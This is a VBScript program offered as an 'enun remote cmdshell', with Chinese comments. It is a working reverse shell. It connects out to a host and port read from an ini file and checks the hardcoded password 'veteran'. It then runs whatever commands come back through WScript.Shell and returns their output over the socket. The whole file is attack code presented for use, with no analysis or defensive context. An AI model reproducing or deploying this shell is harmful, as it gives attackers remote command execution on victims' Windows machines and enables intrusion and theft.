VBScript Enun Remote CMD Shell代码

'============================
' enun remote cmdshell v 1.0
'============================

option explicit

const account_lock_time = 600000    '账户锁定时间，10分钟
const lockout_bad_count = 3     '密码失败次数
const default_wait_time = 1000     '默认延时，1秒
const default_time_out  = 60000    '默认超时，60秒

public winsocket, srevdata, count
do
 on error resume next

 do while (winsocket.state <> 7)
  dim objectfso, getconfig, line, host, port, i

  set winsocket = wscript.createobject("mswinsock.winsock")
  set objectfso = createobject("scripting.filesystemobject")
  set getconfig = objectfso.opentextfile(".\enunrc.ini", 1)

  for i = 1 to 3
   line = getconfig.readline
   if instr(line,"host") > 0 then host = split(line, "=", -1, 1)(1)
   if instr(line,"port") > 0 then port = split(line, "=", -1, 1)(1)
  next

  if (len(host) = 0) then host = "127.0.0.1"
  if (len(port) = 0) then port = "8090"

  winsocket.protocol = 0
  winsocket.remotehost = host
  winsocket.remoteport = port
  winsocket.connect

  wscript.sleep default_wait_time * 5
  call trackscript(2, winsocket.state, winsocket.bytesreceived)
  'setp: 2
 loop

 do while (winsocket.state <> 9 and winsocket.state <> 0)

  dim authkey, lockoutbadcount, timeout_m, timeout_n

  timeout_n = 0

  winsocket.senddata winsocket.localhostname & " is connected, enter password: "
  do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
   timeout_n = timeout_n + 1000

   call controltimeout(timeout_n)
  loop

  winsocket.getdata authkey, vbstring
  if split(authkey, chr(10), -1, 1)(0) = "veteran" then
   winsocket.senddata "logon success, welcome!" & vbcrlf

   srevdata = "veteran"

   do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
    dim shellobj, executes

    set shellobj = createobject("wscript.shell")
    set executes = shellobj.exec(split(srevdata, chr(10), -1, 1)(0))

    winsocket.senddata executes.stdout.readall
    winsocket.senddata executes.stderr.readall

    if (len(srevdata) > 0) then
     timeout_m = 0
     winsocket.senddata vbcrlf & "[" & winsocket.localhostname & "@enun]#: "
    else
     do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
      timeout_m = timeout_m + 1000
      call controltimeout(timeout_m)
     loop
    end if

    if (lcase(left(srevdata, 4)) = "exit") then winsocket.close

    winsocket.getdata srevdata, vbstring

    wscript.sleep default_wait_time
    call trackscript(5, winsocket.state, winsocket.bytesreceived)
    'setp: 5
   loop
  else
   lockoutbadcount = lockoutbadcount + 1
   winsocket.senddata "logon fail: unknown user name or bad password." & vbcrlf
   wscript.sleep default_wait_time
  end if

  if (lockoutbadcount = lockout_bad_count) then
   winsocket.senddata "failed too many times, the account has been locked!" & vbcrlf
   wscript.sleep default_wait_time
   winsocket.close

   lockoutbadcount = 0
   wscript.sleep account_lock_time
   '锁定账户
  end if
  call trackscript(3, winsocket.state, winsocket.bytesreceived)
  'setp: 3
 loop
 call trackscript(1, winsocket.state, winsocket.bytesreceived)
 'setp: 1
loop

 

'=======================
'control timeout.
'=======================
public sub controltimeout(count)
 if count = default_time_out then
  winsocket.senddata vbcrlf & "local server response timeout, please reconnect ..." & vbcrlf
  wscript.sleep default_wait_time
  winsocket.close
  '控制端60秒内无输入的话，连接自动断开，可即时连接。
 else
  wscript.sleep default_wait_time
 end if
 call trackscript(4, winsocket.state, winsocket.bytesreceived)
 'setp: 4
end sub

'=======================
'track script.
'=======================
public sub trackscript(mystep, statecode, bytesreceived)
 wscript.echo "mystep: " & mystep & ", statecode: " & statecode & ", received: " & bytesreceived & " bytes"
end sub